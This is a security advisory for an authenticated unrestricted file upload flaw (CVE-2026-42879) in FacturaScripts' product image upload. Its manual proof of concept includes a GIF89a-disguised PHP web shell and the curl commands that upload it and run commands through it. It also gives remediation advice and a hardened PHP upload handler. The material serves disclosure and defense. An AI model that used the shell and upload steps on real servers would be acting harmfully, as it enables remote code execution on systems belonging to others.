CVSS Vector (NVD)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Description (NVD)
CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass
Summary
An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.
---
Details
The vulnerability exists in:
Core/Lib/ExtendedController/ProductImagesTrait.php
Specifically in the addImageAction() method.
Vulnerable Code
```php
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());
```
Root Cause
- The validation only checks whether the MIME type contains "image/"
- This can be bypassed by prepending GIF89a magic bytes to a PHP file
- The system incorrectly identifies the file as image/gif
- The file is saved with a .php extension in a web-accessible directory
File Storage Behavior
Uploaded files are stored in:
/MyFiles/YYYY/MM/X.php
Where X is an auto-incrementing ID. This allows direct remote execution:
http://target/MyFiles/2026/03/2.php?cmd=id
---
Impact
Successful exploitation:
An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.
---
Proof of Concept (Manual)
Step 1: Create malicious file
```bash
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF
```
Step 2: Authenticate
- Login to the application
- Extract PHPSESSID from browser cookies
Step 3: Get CSRF token
```bash
curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4
```
Step 4: Upload shell
```bash
curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[]=@shell.jpg.php"
```
Step 5: Execute command
```bash
curl "http://target/MyFiles/2026/03/2.php?cmd=id"
```
---
Affected Products
| Field | Value |
|---|---|
| Ecosystem | Packagist |
| CVE ID | CVE-2026-42879 |
| Package Name | facturascripts/facturascripts |
| Affected Versions | <= 2025.81 |
| Patched Versions | Not yet patched |
| Fixed in | Pending |
---
Remediation Recommendations
- Validate file extension: reject any upload where the filename ends in .php, .phtml, .phar, or other executable extensions, regardless of MIME type
- Re-generate filenames on the server: never use getClientOriginalName(); assign a safe UUID-based name with a validated extension
- Store uploads outside the webroot: serve files through a controller that streams content, preventing direct URL execution
- Use a file type library: validate actual file content (magic bytes + extension + MIME type) with a library like fileinfo rather than trusting client-supplied MIME
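A hardened upload handler along the lines of these recommendations, added here as an example and not code from the FacturaScripts project. It assumes a storage directory outside the webroot (UPLOAD_DIR) that already exists, is called with the temporary path from $_FILES, and relies only on PHP's fileinfo and GD extensions; note that content sniffing alone still reports image/gif for a GIF89a-prefixed PHP file, so the server-chosen extension and the re-encode are what actually stop execution.

```php
<?php
// Added example, not FacturaScripts' own code: a hardened replacement for the
// strpos(getMimeType(), 'image/') check. The client-supplied filename and
// extension are never reused; the stored extension comes from the sniffed
// content type through a strict allow-list, the bytes are re-encoded with GD,
// and the result lives outside the webroot. UPLOAD_DIR is an assumed path.

const ALLOWED_IMAGE_TYPES = [        // accepted type => the only extension it may get
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];
const UPLOAD_DIR = '/var/lib/facturascripts-private/uploads'; // assumed, outside DocumentRoot

// Validate an uploaded temp file and return the server-chosen name it was stored
// under; throws on any rejection so a caller cannot skip the check.
function storeProductImage(string $tmpPath): string
{
    if (!is_uploaded_file($tmpPath)) {
        throw new RuntimeException('not an uploaded file');
    }
    // Sniff the real content type. A GIF89a-prefixed PHP file still reports
    // image/gif here, which is exactly why the extension is NOT taken from
    // the client: whatever the bytes are, they can only be stored as .gif.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath) ?: '';
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException("unsupported content type: $mime");
    }
    // Re-encode through GD: bytes that do not decode as an image are rejected,
    // and a genuine image is rewritten without any appended trailing data.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        throw new RuntimeException('file does not decode as an image');
    }
    $ext  = ALLOWED_IMAGE_TYPES[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext; // random, never client-chosen
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = match ($ext) {
        'jpg'  => imagejpeg($img, $dest, 90),
        'png'  => imagepng($img, $dest),
        'gif'  => imagegif($img, $dest),
        'webp' => imagewebp($img, $dest),
    };
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name; // serve it later through a controller, never by direct URL
}
```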
Credits
- Discoverer: Abdullah Alwasabei / Guzrex
Analysis (AI)
Remote code execution in FacturaScripts through authenticated file upload allows attackers with valid credentials to bypass MIME type validation by prepending GIF89a magic bytes to PHP files, resulting in executable files stored in a web-accessible directory. An attacker can upload a malicious PHP file disguised as a GIF image via the product image upload functionality, then directly execute arbitrary commands on the server. …
EUVD-2026-32626
GHSA-vf3q-frmr-vrr9